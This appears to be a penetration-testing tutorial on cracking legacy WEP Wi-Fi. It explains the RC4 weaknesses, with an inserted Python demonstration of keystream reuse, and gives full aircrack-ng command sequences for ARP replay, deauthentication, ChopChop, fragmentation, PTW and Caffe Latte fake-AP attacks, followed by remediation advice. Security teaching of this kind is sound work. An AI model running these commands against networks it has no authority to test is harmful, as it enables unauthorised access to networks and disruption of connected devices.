WEP Cracking (Legacy)
WEP (Wired Equivalent Privacy) was the original 802.11 encryption standard, ratified in 1999 and officially deprecated in 2004 after fatal cryptographic weaknesses were discovered. Despite being obsolete, WEP still appears on legacy industrial controllers, older IoT devices, and neglected network segments. Understanding WEP attacks provides foundational knowledge of wireless cryptanalysis.
Why WEP Is Broken
WEP uses the RC4 stream cipher with a 24-bit Initialization Vector (IV). The fundamental flaws:
| Vulnerability | Technical Detail | Impact |
|---|---|---|
| IV Collision | 24-bit IV = 16.7M possible values; reuse guaranteed after ~5,000 packets (birthday paradox) | Same keystream reused → XOR of two plaintexts leaked |
| Weak IVs (FMS) | Certain IVs correlate with key bytes due to RC4 key scheduling | ~9,000 weak IVs reveal full key (Fluhrer-Mantin-Shamir, 2001) |
| No Replay Protection | No sequence numbering or nonce binding | ARP packets can be replayed to generate unlimited IVs |
| CRC-32 Integrity | Linear CRC-32 checksum (ICV) instead of cryptographic MAC | Packets can be modified without detection (bit-flipping attacks) |
| Static Key | Same shared key used by all clients; no per-session keys | One crack = all clients compromised |
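The first, fourth and fifth rows of the table can be checked directly in code. The block below is an added illustration, not code from the original page or from the aircrack-ng project: it implements a toy RC4 and a WEP-style encapsulation (IV || shared key feeding RC4, CRC-32 as the ICV) with constructed sample keys and plaintexts, then shows that two frames under the same IV leak the XOR of their plaintexts, that the birthday bound puts the first IV repeat at roughly 5,100 frames for a 24-bit IV, and that CRC-32 is affine under XOR, which is why a linear checksum cannot serve as a message authentication code. Function names are my own.

```python
"""Why WEP is broken, demonstrated on constructed data (added example)."""
import math
import os
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA); returns n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP-style body: IV || RC4_{IV||key}(plaintext || CRC32(plaintext)).
    The 3-byte IV travels in the clear, so an observer can see when it repeats."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    body = plaintext + icv
    ks = rc4_keystream(iv + shared_key, len(body))
    return iv + xor_bytes(body, ks)


def keystream_reuse_leak(shared_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames under the same IV share one keystream, so XORing the two
    ciphertexts cancels it and leaves p1 XOR p2 (the IV-collision row)."""
    c1 = wep_encrypt(shared_key, iv, p1)[3:]   # drop the cleartext IV
    c2 = wep_encrypt(shared_key, iv, p2)[3:]
    return xor_bytes(c1, c2)[: len(p1)]


def expected_frames_to_first_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday-bound estimate: about sqrt(pi/2 * N) random draws before the
    first repeat among N = 2**iv_bits IVs; roughly 5,100 for 24 bits."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def crc32_is_affine(a: bytes, b: bytes) -> bool:
    """CRC-32 satisfies crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros) for equal
    lengths. A keyed MAC has no such identity (the CRC-32 integrity row)."""
    assert len(a) == len(b)
    zeros = bytes(len(a))
    return zlib.crc32(xor_bytes(a, b)) == zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(zeros)


if __name__ == "__main__":
    key = os.urandom(13)          # constructed 104-bit ("128-bit") WEP key
    iv = b"\x01\x02\x03"          # constructed IV reused for two frames
    p1, p2 = b"ARP request ...", b"ARP reply   ..."
    leak = keystream_reuse_leak(key, iv, p1, p2)
    print("p1 XOR p2 recovered from ciphertexts alone:", leak == xor_bytes(p1, p2))
    print("expected frames until first IV repeat:", round(expected_frames_to_first_iv_repeat()))
    print("CRC-32 affine under XOR:", crc32_is_affine(b"hello world!", b"HELLO WORLD!"))
```

The static-key row follows from the same code: `wep_encrypt` takes one `shared_key` for every frame and every client, so recovering it once decrypts all traffic on the network, past and future.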
Historical Timeline
2001: FMS attack published (Fluhrer, Mantin, Shamir)
2004: IEEE 802.11i (WPA2) ratified; WEP deprecated
2007: PTW attack reduces required IVs to ~40,000 (under 60 seconds)
2018: Wi-Fi Alliance mandates WPA3 certification
Basic IV + ARP Replay Attack
The classic WEP attack: capture IVs by replaying ARP packets to generate traffic, then crack once enough unique IVs are collected. This is the most reliable method against any WEP network.
Step 1: Start capture on the target channel.

```bash
# Start capturing IVs (-w writes output, -c locks channel)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon
# Watch the #Data column — you need 20,000+ IVs for FMS/KoreK
# or ~40,000+ for PTW (faster statistical attack)
```

Step 2: Fake-authenticate with the AP so it accepts your frames.
```bash
# -1 = fake auth, 0 = reassociation timing, -a = AP BSSID
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# If you see "Association successful" you're in
# Some APs enforce MAC filtering — spoof a legitimate client MAC:
sudo aireplay-ng -1 0 -e "TargetSSID" -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon
```

Step 3: ARP replay to generate a flood of IVs. Each replayed ARP generates a new IV.
```bash
# -3 = ARP request replay attack
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon
# Output shows: "Read XXXX packets, got YYYY ARP requests, sent ZZZZ packets"
# If no ARP packets appear, try deauthing a connected client:
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
```

Step 4: Crack the WEP key once enough IVs are collected.
```bash
# PTW attack (default, fastest — works with ~40,000 IVs)
aircrack-ng wep_capture-01.cap
# Force FMS/KoreK attack (works with fewer unique IVs)
aircrack-ng -K wep_capture-01.cap
# Specify key length if known (64-bit or 128-bit)
aircrack-ng -n 128 wep_capture-01.cap
# Successful output:
# KEY FOUND! [ DE:AD:BE:EF:CA ]
# Decrypted correctly: 100%
```

ChopChop Attack
The ChopChop attack (KoreK, 2004) decrypts a WEP packet one byte at a time by exploiting the linear CRC-32 checksum. It doesn't directly recover the WEP key but produces a PRGA (Pseudo Random Generation Algorithm) keystream file that can be used to forge packets and generate traffic.
```bash
# -4 = ChopChop attack, -b = target BSSID
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF wlan0mon
# When prompted "Use this packet?" answer 'y'
# Attack chops 1 byte at a time from the encrypted packet
# Output: replay_dec-XXXX.xor (PRGA keystream file)
# Use the keystream to forge an ARP packet
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w forged-arp.cap
# Inject the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon
```
Fragmentation Attack
The fragmentation attack obtains 1,500 bytes of PRGA keystream from a single data packet. This is faster than ChopChop and enough keystream to forge full-sized packets.
```bash
# -5 = Fragmentation attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF wlan0mon
# Answer 'y' to use the captured packet
# Output: fragment-XXXX.xor (1500 bytes of keystream)
# Forge an ARP packet with the keystream
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w forged-arp.cap
# Inject forged ARP → generates IVs → crack with aircrack-ng
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon
```

PTW Attack (Fast Crack)
The Pyshkin-Tews-Weinmann (PTW, 2007) attack is the fastest WEP crack method. It uses a statistical approach on ARP packets and needs only ~40,000 IVs for a 104-bit key — cracking in under 60 seconds on a modern laptop. This is aircrack-ng's default mode.
```bash
# PTW is the default attack in aircrack-ng
# Requires ARP packets specifically (not just any IVs)
aircrack-ng -z wep_capture-01.cap
# PTW works best with ARP traffic → combine with ARP replay
# Full automated workflow:
# Terminal 1: sudo airodump-ng -c 6 --bssid AP_MAC -w wep wlan0mon
# Terminal 2: sudo aireplay-ng -1 0 -a AP_MAC wlan0mon
# Terminal 3: sudo aireplay-ng -3 -b AP_MAC wlan0mon
# Terminal 4: aircrack-ng -z wep-01.cap (runs continuously, retries every 5000 IVs)
# For 64-bit WEP keys: ~20,000 IVs sufficient
# For 128-bit WEP keys: ~40,000 IVs sufficient
```

Caffe Latte Attack
The Caffe Latte attack (2007) recovers a WEP key from a client that is not connected to any AP. If a laptop has a saved WEP network, it will probe for it — and you can respond, trick it into generating encrypted traffic, and crack the key without the original AP being present.
```bash
# Create a fake AP matching the client's saved WEP network
# The client auto-connects and generates GRATUITOUS ARP packets
sudo airbase-ng -c 6 -e "TargetSSID" -W 1 wlan0mon
# In another terminal: capture the IV traffic
sudo airodump-ng -c 6 --bssid <airbase_MAC> -w caffe wlan0mon
# The client sends ARP requests for its remembered IP
# Bit-flip these into ARP replies → generate more IVs
# Crack when enough IVs collected
aircrack-ng caffe-01.cap
```
Where WEP Still Lives
Despite being deprecated for two decades, WEP persists in specific environments:
🏭 Industrial / SCADA
Legacy PLCs and HMIs with embedded 802.11b radios that cannot be firmware-updated. Common in manufacturing plants with 20+ year equipment lifecycles.
🏥 Medical Devices
Older infusion pumps, patient monitors, and PACS systems. FDA certification makes firmware updates extremely slow.
🎮 Gaming / Retro
Nintendo DS, original PSP, and other legacy gaming consoles with Wi-Fi only support WEP. Hobbyist networks still use it.
📡 Wireless Bridges
Point-to-point wireless links in older building-to-building setups. Often forgotten and unmaintained.
Defense & Remediation
If WEP is discovered during a penetration test, the remediation is straightforward:
- ✅ Upgrade to WPA2-AES immediately — there is no way to secure WEP
- ✅ Isolate legacy devices that cannot support WPA2 on a dedicated VLAN with strict firewall rules
- ✅ Wrap with VPN if device must use WEP — IPsec or WireGuard tunnel over the WEP link
- ✅ Audit saved profiles on corporate laptops for stored WEP networks (Caffe Latte risk)
- ✅ Monitor for WEP APs using WIDS/WIPS — any WEP beacon should trigger an alert
WEP Cracking Practice
Practice WEP key recovery using IV collection, PTW, and fragmentation attacks in a safe lab.